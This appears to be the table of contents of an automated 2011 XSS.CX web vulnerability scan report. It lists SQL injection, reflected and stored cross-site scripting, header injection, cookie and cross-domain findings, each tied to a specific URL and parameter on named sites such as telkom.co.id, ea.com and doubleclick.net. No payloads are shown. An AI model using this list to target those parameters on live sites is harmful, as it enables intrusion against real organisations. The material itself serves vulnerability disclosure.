XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06252011-01

Report generated by XSS.CX at Sat Jun 25 09:46:18 CDT 2011.

1. SQL injection

1.1. http://beta.telkom.co.id/op.php [icid parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

2. Cross-site scripting (stored)

2.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

2.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

3. HTTP header injection

3.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]

3.3. http://sales.swsoft.com/buyonline/ [key parameter]

3.4. http://sales.swsoft.com/buyonline/ [name of an arbitrarily supplied request parameter]

3.5. http://sales.swsoft.com/buyonline/ [os parameter]

3.6. http://sales.swsoft.com/buyonline/ [store_id parameter]

3.7. http://sales.swsoft.com/buyonline/ [version parameter]

3.8. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/ [REST URL parameter 3]

4. Cross-site scripting (reflected)

4.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

4.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

4.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

4.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

4.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

4.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

4.7. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]

4.8. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]

4.9. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]

4.10. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]

4.11. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]

4.12. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]

4.13. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]

4.14. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]

4.15. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]

4.16. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]

4.17. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]

4.18. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]

4.19. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]

4.20. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

4.22. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.23. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.24. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.25. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.26. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.27. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.28. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.29. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.30. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.31. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.32. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.33. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.34. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.35. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.36. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.37. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.38. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.39. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.40. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.41. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.42. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.43. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.44. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.45. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.46. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.47. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.48. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.49. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.50. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.51. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.52. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.53. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.54. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.55. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.56. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.57. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.58. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.59. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.60. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.61. http://coverage.mqcdn.com/coverage [jsonp parameter]

4.62. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

4.63. http://display.digitalriver.com/ [aid parameter]

4.64. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

4.65. http://display.digitalriver.com/ [tax parameter]

4.66. http://drh2.img.digitalriver.com/store [CategoryID parameter]

4.67. http://ds.addthis.com/red/psi/sites/www.phuket.com/p.json [callback parameter]

4.68. http://km5002.keymetric.net/KM2.js [hist parameter]

4.69. http://km5002.keymetric.net/KM2.js [lag parameter]

4.70. http://km5002.keymetric.net/KM2.js [las parameter]

4.71. http://km5002.keymetric.net/KM2.js [lc1 parameter]

4.72. http://km5002.keymetric.net/KM2.js [lc2 parameter]

4.73. http://km5002.keymetric.net/KM2.js [lc3 parameter]

4.74. http://km5002.keymetric.net/KM2.js [lc4 parameter]

4.75. http://km5002.keymetric.net/KM2.js [lc5 parameter]

4.76. http://km5002.keymetric.net/KM2.js [lca parameter]

4.77. http://km5002.keymetric.net/KM2.js [lkw parameter]

4.78. http://km5002.keymetric.net/KM2.js [lmt parameter]

4.79. http://km5002.keymetric.net/KM2.js [rho parameter]

4.80. http://km5002.keymetric.net/KM2.js [rqu parameter]

4.81. http://km5002.keymetric.net/KM2.js [vid parameter]

4.82. http://s31.sitemeter.com/js/counter.js [site parameter]

4.83. http://search.asiawebdirect.com/ [checkHotel%5BDestinationID%5D parameter]

4.84. http://store.origin.com/ [name of an arbitrarily supplied request parameter]

4.85. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]

4.86. http://store.origin.com/servlet/ControllerServlet [name of an arbitrarily supplied request parameter]

4.87. http://store.origin.com/servlet/ControllerServlet [objectID parameter]

4.88. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

4.89. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

4.90. http://store.origin.com/store [objectID parameter]

4.91. http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247 [name of an arbitrarily supplied request parameter]

4.92. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 [name of an arbitrarily supplied request parameter]

4.93. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 [name of an arbitrarily supplied request parameter]

4.94. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000 [name of an arbitrarily supplied request parameter]

4.95. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]

4.96. http://web-static.ea.com/us/favicon.ico [REST URL parameter 2]

4.97. http://web-static.ea.com/us/portal/css/base/js-dependant/game_gamefeatures.css [REST URL parameter 6]

4.98. http://web-static.ea.com/us/portal/css/base/js-dependant/hideOnLoad.css [REST URL parameter 6]

4.99. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-facebox.css [REST URL parameter 6]

4.100. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-ui.css [REST URL parameter 6]

4.101. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.eventcalendar.css [REST URL parameter 6]

4.102. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.pagination.css [REST URL parameter 6]

4.103. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.slider.css [REST URL parameter 6]

4.104. http://web-static.ea.com/us/portal/css/base/reset.css [REST URL parameter 5]

4.105. http://web-static.ea.com/us/portal/css/base/utils.css [REST URL parameter 5]

4.106. http://web-static.ea.com/us/portal/css/ea_global_footer.css [REST URL parameter 4]

4.107. http://web-static.ea.com/us/portal/css/ea_gus.css [REST URL parameter 4]

4.108. http://web-static.ea.com/us/portal/css/gui.css [REST URL parameter 4]

4.109. http://web-static.ea.com/us/portal/css/layout.css [REST URL parameter 4]

4.110. http://web-static.ea.com/us/portal/css/localized.css [REST URL parameter 4]

4.111. http://web-static.ea.com/us/portal/css/typography.css [REST URL parameter 4]

4.112. http://web-static.ea.com/us/portal/images/TrustELogo.jpg [REST URL parameter 4]

4.113. http://web-static.ea.com/us/portal/images/flag_icons/us.gif [REST URL parameter 5]

4.114. http://web-static.ea.com/us/portal/images/icon_downloads.png [REST URL parameter 4]

4.115. http://web-static.ea.com/us/portal/images/icon_music.png [REST URL parameter 4]

4.116. http://web-static.ea.com/us/portal/images/icon_photo.png [REST URL parameter 4]

4.117. http://web-static.ea.com/us/portal/images/icon_video.png [REST URL parameter 4]

4.118. http://web-static.ea.com/us/portal/images/icons/blog-icon.png [REST URL parameter 5]

4.119. http://web-static.ea.com/us/portal/images/icons/forum-icon.png [REST URL parameter 5]

4.120. http://web-static.ea.com/us/portal/images/icons/podcast-icon.png [REST URL parameter 5]

4.121. http://web-static.ea.com/us/portal/images/icons/tips-icon.png [REST URL parameter 5]

4.122. http://web-static.ea.com/us/portal/images/site_logos/battlefield.jpg [REST URL parameter 5]

4.123. http://web-static.ea.com/us/portal/images/site_logos/command_conquer.jpg [REST URL parameter 5]

4.124. http://web-static.ea.com/us/portal/images/site_logos/ea_sports.jpg [REST URL parameter 5]

4.125. http://web-static.ea.com/us/portal/images/site_logos/nfs.jpg [REST URL parameter 5]

4.126. http://web-static.ea.com/us/portal/images/site_logos/pogo.jpg [REST URL parameter 5]

4.127. http://web-static.ea.com/us/portal/images/site_logos/sims.jpg [REST URL parameter 5]

4.128. http://web-static.ea.com/us/portal/js/ea/Framework.js [REST URL parameter 5]

4.129. http://web-static.ea.com/us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js [REST URL parameter 5]

4.130. http://web-static.ea.com/us/portal/js/jquery/jquery-1.2.6.min.js [REST URL parameter 5]

4.131. http://web-static.ea.com/us/portal/js/jquery/jquery-1.4.2.min.js [REST URL parameter 5]

4.132. http://web-static.ea.com/us/portal/js/jquery/jquery-easing-1.3.min.js [REST URL parameter 5]

4.133. http://web-static.ea.com/us/portal/js/jquery/jquery-facebox-1.2.min.js [REST URL parameter 5]

4.134. http://web-static.ea.com/us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js [REST URL parameter 5]

4.135. http://web-static.ea.com/us/portal/js/jquery/jquery.checkbox.js [REST URL parameter 5]

4.136. http://web-static.ea.com/us/portal/js/jquery/jquery.dynamic-drop.js [REST URL parameter 5]

4.137. http://web-static.ea.com/us/portal/js/jquery/jquery.equalizecols.js [REST URL parameter 5]

4.138. http://web-static.ea.com/us/portal/js/jquery/jquery.eventcalendar.min.js [REST URL parameter 5]

4.139. http://web-static.ea.com/us/portal/js/jquery/jquery.labelinput.js [REST URL parameter 5]

4.140. http://web-static.ea.com/us/portal/js/jquery/jquery.pagination.js [REST URL parameter 5]

4.141. http://web-static.ea.com/us/portal/js/jquery/jquery.slider.min.js [REST URL parameter 5]

4.142. http://web-static.ea.com/us/portal/js/jquery/jquery.sortlist.js [REST URL parameter 5]

4.143. http://web-static.ea.com/us/portal/js/jquery/jquery.spotlight.min.js [REST URL parameter 5]

4.144. http://web-static.ea.com/us/portal/js/jquery/jquery.tab.js [REST URL parameter 5]

4.145. http://web-static.ea.com/us/portal/js/jquery/jquery.validate-1.5.min.js [REST URL parameter 5]

4.146. http://web-static.ea.com/us/portal/js/swfobject/swfobject.min.js [REST URL parameter 5]

4.147. http://web.sa.mapquest.com/mobil1/ [tempset parameter]

4.148. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.149. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.150. http://www.ea.com/json/user-menu [returnUrl parameter]

4.151. http://www.exxonmobilstations.com/favicon.ico [REST URL parameter 1]

4.152. http://www.exxonmobilstations.com/favicon.ico [name of an arbitrarily supplied request parameter]

4.153. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 1]

4.154. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 2]

4.155. http://www.linkedin.com/countserv/count/share [url parameter]

4.156. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [sourceid parameter]

4.157. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js [Referer HTTP header]

4.158. http://www.pogo.com/login/entry.jsp [Referer HTTP header]

4.159. http://www.pogo.com/login/media/Pogo_General_LP_2.swf [Referer HTTP header]

4.160. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [Referer HTTP header]

4.161. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

4.162. http://mapquest.com/ [name of an arbitrarily supplied request parameter]

4.163. http://support.ea.com/ [cp_session cookie]

4.164. http://support.ea.com/app/answers/detail/a_id/3628 [cp_session cookie]

4.165. http://support.ea.com/app/answers/detail/a_id/4394 [cp_session cookie]

5. Flash cross-domain policy

5.1. http://a.netmng.com/crossdomain.xml

5.2. http://ad.doubleclick.net/crossdomain.xml

5.3. http://d.adroll.com/crossdomain.xml

5.4. http://d1.openx.org/crossdomain.xml

5.5. http://fls.doubleclick.net/crossdomain.xml

5.6. http://ib.adnxs.com/crossdomain.xml

5.7. http://idcs.interclick.com/crossdomain.xml

5.8. http://m.adnxs.com/crossdomain.xml

5.9. http://rcci.122.2o7.net/crossdomain.xml

5.10. http://segment-pixel.invitemedia.com/crossdomain.xml

5.11. http://swsoft.122.2o7.net/crossdomain.xml

5.12. http://wotifcom.112.2o7.net/crossdomain.xml

5.13. http://googleads.g.doubleclick.net/crossdomain.xml

5.14. http://static.ak.fbcdn.net/crossdomain.xml

5.15. http://www.facebook.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://rcci.122.2o7.net/clientaccesspolicy.xml

6.3. http://swsoft.122.2o7.net/clientaccesspolicy.xml

6.4. http://wotifcom.112.2o7.net/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://everquest2.com/free_to_play

7.2. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js

7.3. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

7.4. http://www.telkomsel.com/product/blackberry/undefined

8. SSL cookie without secure flag set

9. Session token in URL

9.1. http://bh.contextweb.com/bh/set.aspx

9.2. http://clicktoverify.truste.com/images/pos_btn3.png

9.3. http://clicktoverify.truste.com/images/watch_btn3.png

9.4. http://clicktoverify.truste.com/pvr.php

9.5. http://l.sharethis.com/pview

9.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

9.7. https://softlayer.parallelsmarketplace.com/store/index.php

9.8. https://softlayer.parallelsmarketplace.com/store/index.php

9.9. http://www.facebook.com/extern/login_status.php

10. Password field submitted using GET method

11. Open redirection

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://api.twitter.com/1/urls/resolve.json

12.3. http://www.ea.com/dynajs/gus.jsx

12.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

12.5. http://a.netmng.com/

12.6. http://ad.doubleclick.net/click

12.7. http://ad.trafficmp.com/a/bpix

12.8. http://ads.lucidmedia.com/clicksense/pixel

12.9. http://ads.pointroll.com/PortalServe/

12.10. http://api.facebook.com/restserver.php

12.11. http://ar.voicefive.com/b/wc_beacon.pli

12.12. http://b.scorecardresearch.com/b

12.13. http://b.scorecardresearch.com/r

12.14. http://b.voicefive.com/b

12.15. http://bh.contextweb.com/bh/rtset

12.16. http://bh.contextweb.com/bh/set.aspx

12.17. http://ce.lijit.com/merge

12.18. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

12.19. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

12.20. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

12.21. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

12.22. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

12.23. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

12.24. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

12.25. http://ib.adnxs.com/seg

12.26. http://id.google.com/verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif

12.27. http://id.google.com/verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif

12.28. http://idcs.interclick.com/Segment.aspx

12.29. http://images.apple.com/global/nav/styles/navigation.css

12.30. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

12.31. http://m.adnxs.com/msftcookiehandler

12.32. http://media.fastclick.net/w/get.media

12.33. http://media.fastclick.net/w/tre

12.34. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

12.35. http://pixel.quantserve.com/pixel

12.36. http://pixel.rubiconproject.com/tap.php

12.37. http://r.openx.net/set

12.38. http://r.turn.com/r/beacon

12.39. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

12.40. http://segment-pixel.invitemedia.com/pixel

12.41. http://segments.adap.tv/data/

12.42. http://tracking.searchmarketing.com/welcome.asp

12.43. http://www.addthis.com/bookmark.php

12.44. http://www.facebook.com/login.php

12.45. http://www.facebook.com/sharer/sharer.php

12.46. http://www.xobni.com/csscache/1306529290/styles/chalupa.css

12.47. http://www.xobni.com/favicon.ico

12.48. http://www.xobni.com/javascripts/jquery.base64.min.js

12.49. http://www.xobni.com/javascripts/jquery.json-2.2.min.js

12.50. http://www.xobni.com/media/fonts/Chunkfive-webfont.woff

13. Cookie without HttpOnly flag set

13.1. http://beta.telkom.co.id/

13.2. http://listings.mapquest.com/apps/

13.3. http://ro-c.redorbit.com/modules/news/include/secureimage/image.veriword.php

13.4. http://sales.swsoft.com/buyonline/

13.5. https://softlayer.parallelsmarketplace.com/store/index.php

13.6. http://tracking.searchmarketing.com/welcome.asp

13.7. http://tracking.searchmarketing.com/welcome.asp

13.8. http://tracking.searchmarketing.com/welcome.asp

13.9. http://tracking.searchmarketing.com/welcome.asp

13.10. http://tracking.searchmarketing.com/welcome.asp

13.11. http://tracking.searchmarketing.com/welcome.asp

13.12. http://www.citibank.com/us/cards/exmbl/aos.jsp

13.13. http://www.citibank.com/us/cards/exmbl/exmb_personal.jsp

13.14. http://www.ea.com/dynajs/gus.jsx

13.15. http://www.phuket-travel.com/nightlife/fantasea.htm

13.16. http://www.phuket.com/andamanwhitebeach/

13.17. http://www.telkom-indonesia.com/

13.18. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

13.19. http://a.netmng.com/

13.20. http://aboutus.ea.com/

13.21. http://aboutus.ea.com/favicon.ico

13.22. http://ad.doubleclick.net/click

13.23. http://ad.trafficmp.com/a/bpix

13.24. http://ad.yieldmanager.com/pixel

13.25. http://ad.yieldmanager.com/unpixel

13.26. http://ads.lucidmedia.com/clicksense/pixel

13.27. http://ads.pointroll.com/PortalServe/

13.28. http://ar.voicefive.com/b/wc_beacon.pli

13.29. http://b.scorecardresearch.com/b

13.30. http://b.scorecardresearch.com/r

13.31. http://b.voicefive.com/b

13.32. http://bh.contextweb.com/bh/rtset

13.33. http://bh.contextweb.com/bh/set.aspx

13.34. http://ce.lijit.com/merge

13.35. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM

13.36. http://d1.openx.org/afr.php

13.37. http://d1.openx.org/avw.php

13.38. http://d1.openx.org/ck.php

13.39. http://d1.openx.org/lg.php

13.40. http://d1.openx.org/spc.php

13.41. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

13.42. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

13.43. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

13.44. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

13.45. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

13.46. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

13.47. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

13.48. http://idcs.interclick.com/Segment.aspx

13.49. http://images.apple.com/global/nav/styles/navigation.css

13.50. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

13.51. http://media.fastclick.net/w/get.media

13.52. http://media.fastclick.net/w/tre

13.53. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

13.54. http://pixel.quantserve.com/pixel

13.55. http://pixel.rubiconproject.com/tap.php

13.56. http://r.openx.net/set

13.57. http://r.turn.com/r/beacon

13.58. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

13.59. http://segment-pixel.invitemedia.com/pixel

13.60. http://segments.adap.tv/data/

13.61. http://statse.webtrendslive.com/dcsjn8qwj10000wge3o74vumw_2o3f/dcs.gif

13.62. http://store.origin.com/DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js

13.63. http://store.origin.com/DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg

13.64. http://store.origin.com/store

13.65. http://support.ea.com/

13.66. http://support.ea.com/app/answers/detail/a_id/3628

13.67. http://support.ea.com/app/answers/detail/a_id/4394

13.68. http://thesearchagency.net/pixspike.php

13.69. http://vendorweb.citibank.com/HG

13.70. http://videogamevoters.org/index.php/modal/sc-soon

13.71. http://videogamevoters.org/js/index

13.72. http://videogamevoters.org/page/spud

13.73. http://www.addthis.com/bookmark.php

13.74. http://www.facebook.com/login.php

13.75. http://www.gamersdailynews.com/advertising/administration/www/delivery/ajs.php

13.76. http://www.gamersdailynews.com/advertising/administration/www/delivery/lg.php

13.77. http://www.googleadservices.com/pagead/aclk

13.78. http://www.mapquest.com/_svc/ad/getads

13.79. http://www.mapquest.com/_svc/apixel

13.80. http://www.mapquest.com/_svc/publishing/promo

13.81. http://www.mapquest.com/_svc/searchio

13.82. http://www.mapquest.com/cdn/_uac/adpage.htm

13.83. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

13.84. http://www.mapquest.com/icons/stop.png

13.85. http://www.metlife.com/system/css/components_home.css

13.86. http://www.metlife.com/system/css/global.css

13.87. http://www.metlife.com/system/js/vendor/optimost.js

13.88. http://www.onlinecomcast.com/

13.89. http://www.sdc.exxonmobil.com/dcsvakn9g8s9lijdbimge5rk6_8p6d/dcs.gif

14. Password field with autocomplete enabled

14.1. https://customersupport.ea.com/loginapp/cp/login.do

14.2. http://everquest2.com/free_to_play

14.3. https://store.playstation.com/external/index.vm

14.4. http://twitter.com/

14.5. http://twitter.com/

14.6. http://twitter.com/

14.7. http://www.facebook.com/login.php

14.8. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js

14.9. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

14.10. http://www.telkomsel.com/product/blackberry/undefined

15. Source code disclosure

15.1. http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/

15.2. http://cdn.wn.com/or/js/underscore-0.6.0.js

15.3. http://cdn.wn.com/or/js/videoplayer-20110119-2.min.js

15.4. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-quick-start/prettify.js

15.5. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/prettify.js

15.6. http://hotels.asiawebdirect.com/min/f=awdShared/js/prototype.js,awdShared/chromejs/chrome.js,awdShared/js/jquery.js,awdShared/js/jquery-ui.js,awdShared/js/supersearch.js,awdShared/js/destinationnav.js,awdShared/js/redesign_js.js,awdShared/js/template.js,awdShared/js/scriptaculous.js,awdShared/js/effects.js,awdShared/js/builder.js,awdShared/js/livepipe.js,awdShared/js/slider.js,awdShared/js/scrollbar.js,awdShared/js/destinationbox.js,awdShared/js/lightbox.js,awdShared/js/gblcalendar.js,/scripts/placeholders.js&5678

15.7. http://rates.asiawebdirect.com/asahi/frontend.php/rates/dest/en/75/checkIn/14/true/20110624/20110625

15.8. http://rates.asiawebdirect.com/asahi/js/all_scripts_no_prototype2.jsi

16. Referer-dependent response

16.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.2. http://d1.openx.org/afr.php

16.3. http://use.typekit.com/k/dum7haf-e.css

16.4. http://www.facebook.com/plugins/like.php

16.5. http://www.facebook.com/plugins/likebox.php

16.6. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js

16.7. http://www.pogo.com/login/media/Pogo_General_LP_2.swf

16.8. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

17. Cross-domain POST

17.1. http://phuket.com/

17.2. http://phuket.com/

17.3. http://www.citibank.com/favicon.ico

17.4. http://www.phuket-travel.com/

17.5. http://www.phuket-travel.com/

17.6. http://www.phuket-travel.com/nightlife/fantasea.htm

17.7. http://www.phuket-travel.com/nightlife/fantasea.htm

17.8. http://www.phuket-travel.com/premium-packages/index.htm

17.9. http://www.phuket.com/andamanwhitebeach/

17.10. http://www.phuket.com/andamanwhitebeach/

17.11. http://www.phuket.com/islands/index.htm

17.12. http://www.phuket.com/islands/index.htm

18. Cross-domain Referer leakage

18.1. http://beta.telkom.co.id/products-services/index.html

18.2. http://beta.telkom.co.id/rss/SimplePie/index.php

18.3. http://beta.telkom.co.id/rss/SimplePie/index.php

18.4. http://clicktoverify.truste.com/pvr.php

18.5. http://cm.g.doubleclick.net/pixel

18.6. http://d1.openx.org/afr.php

18.7. http://d1.openx.org/afr.php

18.8. http://d1.openx.org/afr.php

18.9. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

18.10. http://eastore.ea.com/integration/job/request/ShoppingCartService/ea/site/

